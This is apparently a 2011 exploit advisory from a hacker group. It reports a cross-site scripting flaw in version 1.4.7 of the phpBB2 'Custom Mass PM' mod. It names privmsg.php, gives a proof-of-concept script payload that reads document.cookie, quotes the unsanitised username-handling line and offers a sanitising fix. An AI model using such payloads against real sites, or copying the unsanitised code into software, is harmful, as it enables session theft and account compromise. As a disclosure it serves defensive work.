PhpBB2 Custom Mass PM module version 1.4.7 suffers from a cross site scripting vulnerability.
648c8c5b2c43212ed2869a5a97dd8eba5458cc741457bb3bc41e7d49dbbb1ca9
-------------------------------------------------------------------------------
0 | | | | | | TM
1 _______ _ __ ___ ______| |__ __ _ ___| | _____ _ __ _ __ ___| |_
0 |_ / _ \| '_ \ / _ \______| '_ \ / _` |/ __| |/ / _ \ '__| '_ \ / _ \ __|
1 / / (_) | | | | __/ | | | | (_| | (__| < __/ | _| | | | __/ |_
0 /___\___/|_| |_|\___| |_| |_|\__,_|\___|_|\_\___|_|(_)_| |_|\___|\__|
1 0xPrivate 0xSecurity 0xTeam
0 ++++++++++++++++++++++++++++++++++++++++++++++++++++
1 A Placec Of 0days
------------------------------------------------------------------------------
^ Exploit title: PhpBB2 Module "Custom Mass PM" Cross Site Scripting Vulnerability
^ Author : Silic0n (science_media017[At]yahoo.com)
^ MOD Title: Custom mass PM
^ MOD Description: Add mass PM functionnality to group members (or all forums members) for authorized users. Add the possibility for all users to send ordinary PM to multiple users (usernames separated by a semi-colon)
^ MOD Version: 1.4.7
^ Exploit Release: 8/27/2011
^ Vulnearble script: privmsg.php
--------------------
^ Payload
--------------------
0x1 : Goto forum_script/Privmsg.php
0x2 : Username Input Box write Malicious JS eg :<script>alert(document.cookie)</script>
--------------------
^ Vulnearble code
--------------------
$to_username_array = explode (";", $HTTP_POST_VARS['username']);
--------------------
Fix :
--------------------
$to_username = phpbb_clean_username($HTTP_POST_VARS['username']);
$to_username_array = explode (";", $to_username);
Special Thnanks To mafi, Gaurav_raj420 , Exidous , Mr 52 (7) , Dalsim , Zetra , root4o ,
D4rk, Danzel, messsy , Thor ,abronsius ,Nova , jaya ,@ry@n ,entr0py, -[SiLeNtp0is0n]-
,Ne0_Hacker, InX_R00t,DODo(:P) All ZH , DK & G4H members :)
------------
^ Site
------------
www.igniteds.net (ConsoleFx)